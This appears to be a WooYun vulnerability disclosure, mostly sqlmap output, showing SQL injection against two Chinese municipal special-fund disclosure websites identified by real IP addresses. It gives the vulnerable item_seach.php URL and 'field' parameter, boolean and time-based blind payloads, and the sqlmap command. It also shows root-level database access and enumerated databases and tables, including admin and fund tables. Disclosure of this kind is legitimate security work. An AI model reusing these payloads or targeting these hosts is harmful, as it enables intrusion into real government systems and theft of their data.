WooYun.org

http://60.10.25.13/www/ 廊坊市专项资金公开网

漏洞参数：field
http://60.10.25.13/www/item_seach.php?field=plan_money&keywords=&order=desc&style=&town=&unit_id=&village=

root用户

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: field
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: field=plan_money AND 1253=1253&keywords=&order=desc&style=&town=&un
it_id=&village=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: field=plan_money AND SLEEP(5)&keywords=&order=desc&style=&town=&uni
t_id=&village=
---
[17:18:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.11
[17:18:02] [INFO] fetching current user
[17:18:02] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[17:18:02] [INFO] retrieved:
[17:18:12] [WARNING] reflective value(s) found and filtering out
root@%
current user: 'root@%'
[17:25:42] [INFO] fetching current database
[17:25:42] [INFO] retrieved: langfang
current database: 'langfang'
[17:35:33] [INFO] fetching database names
[17:35:33] [INFO] fetching number of databases
[17:35:33] [INFO] retrieved: 8
[17:36:38] [INFO] retrieved: information_schema
[17:57:08] [INFO] retrieved: gaogang
[18:05:45] [INFO] retrieved: langfang
[18:15:25] [INFO] retrieved: langfang_bake
[18:30:29] [INFO] retrieved: langfang_peixun
[18:47:43] [INFO] retrieved: mysql
[18:54:11] [INFO] retrieved: test
[18:59:34] [INFO] retrieved: zuzhijigou-tmp
available databases [8]:
[*] `zuzhijigou-tmp`
[*] gaogang
[*] information_schema
[*] langfang
[*] langfang_bake
[*] langfang_peixun
[*] mysql
[*] test

218张表，部分数据

[09:11:44] [INFO] fetching tables for database: 'langfang'
[09:11:44] [INFO] fetching number of tables for database 'langfang'
[09:11:44] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[09:11:44] [INFO] retrieved: 218
[09:13:54] [INFO] retrieved: admin
[09:20:22] [INFO] retrieved: admin_identify
[09:31:58] [INFO] retrieved: admin_login_info
[09:44:54] [INFO] retrieved: admin_order_set
[09:56:50] [INFO] retrieved: admin_persona_func
[10:11:55] [INFO] retrieved: admin_right
[10:19:29] [INFO] retrieved: admin_unit_right
[10:32:28] [INFO] retrieved: book_temp
[10:43:25] [INFO] retrieved: city
[10:48:58] [INFO] retrieved: city_copy
[10:56:05] [INFO] retrieved: counter
[11:03:56] [INFO] retrieved: cp_info
[11:11:48] [INFO] retrieved: cp_re
[11:15:41] [INFO] retrieved: cp_reply
[11:20:46] [INFO] retrieved: cp_reply_appraise
[11:32:49] [INFO] retrieved: cp_to
[11:36:41] [INFO] retrieved: cp_to_log
[11:42:50] [INFO] retrieved: cp_unit
[11:48:51] [INFO] retrieved: department
[12:00:51] [INFO] retrieved: flink
[12:07:28] [INFO] retrieved: flink_type
[12:14:41] [INFO] retrieved: funds_acc
[12:24:41] [INFO] retrieved: funds_acc_item
[12:32:32] [INFO] retrieved: funds_account
[12:39:28] [INFO] retrieved: funds_class
[12:47:01] [INFO] retrieved: funds_class_unit
[12:55:11] [INFO] retrieved: funds_class_year
[13:02:36] [INFO] retrieved: funds_coa
[13:07:05] [INFO] retrieved: funds_coa_acc
[13:13:53] [INFO] retrieved: funds_detail
[13:22:31] [INFO] retrieved: funds_detail_in
[13:28:41] [INFO] retrieved: funds_detail_in_log
[13:36:24] [INFO] retrieved: funds_detail_out
[13:42:53] [INFO] retrieved: funds_detail_out_excel
[13:52:55] [INFO] retrieved: funds_detail_out_fujian
[14:03:15] [INFO] retrieved: funds_detail_res
[14:09:44] [INFO] retrieved: funds_detail_send
[14:17:19] [INFO] retrieved: funds_detail_send_log
[14:25:25] [INFO] retrieved: funds_detail_tmp
[14:31:58] [INFO] retrieved: funds_detail_total
[14:39:43] [INFO] retrieved: funds_edu_del
[14:49:26] [INFO] retrieved: funds_edu_head
[14:56:33] [INFO] retrieved: funds_edu_res
[15:02:33] [INFO] retrieved: funds_fujian
[15:11:12] [INFO] retrieved: funds_fujian_lis

http://218.25.228.157/www/ 本溪市专项资金公开网

参数还是一样，field
[root@Hacker~]# Sqlmap -u "http://218.25.228.157/www/item_seach.php?field=plan_m
oney&keywords=&order=desc&style=&town=&unit_id=&village=" --dbs --current-user --current-db


root用户
Place: GET
Parameter: field
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: field=plan_money AND 3510=3510&keywords=&order=desc&style=&town=&un
it_id=&village=
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: field=plan_money AND SLEEP(5)&keywords=&order=desc&style=&town=&uni
t_id=&village=
---
[20:19:50] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.11
[20:19:50] [INFO] fetching current user
[20:19:50] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[20:19:50] [INFO] retrieved:
[20:20:00] [WARNING] reflective value(s) found and filtering out
root@%
current user: 'root@%'
[20:27:53] [INFO] fetching current database
[20:27:53] [INFO] retrieved: benxi
current database: 'benxi'
[20:34:43] [INFO] fetching database names
[20:34:43] [INFO] fetching number of databases
[20:34:43] [INFO] retrieved: 4
[20:35:42] [INFO] retrieved: information_schema
[20:57:25] [INFO] retrieved: benxi
[21:04:17] [INFO] retrieved: mysql
[21:11:08] [INFO] retrieved: test
available databases [4]:
[*] benxi
[*] information_schema
[*] mysql
[*] test

215张表 时间注入，部分数据说明问题
[08:52:46] [INFO] fetching tables for database: 'benxi'
[08:52:46] [INFO] fetching number of tables for database 'benxi'
[08:52:46] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[08:52:46] [INFO] retrieved: 215
[08:55:05] [INFO] retrieved: admin
[09:01:58] [INFO] retrieved: admin_identify
[09:14:23] [INFO] retrieved: admin_login_info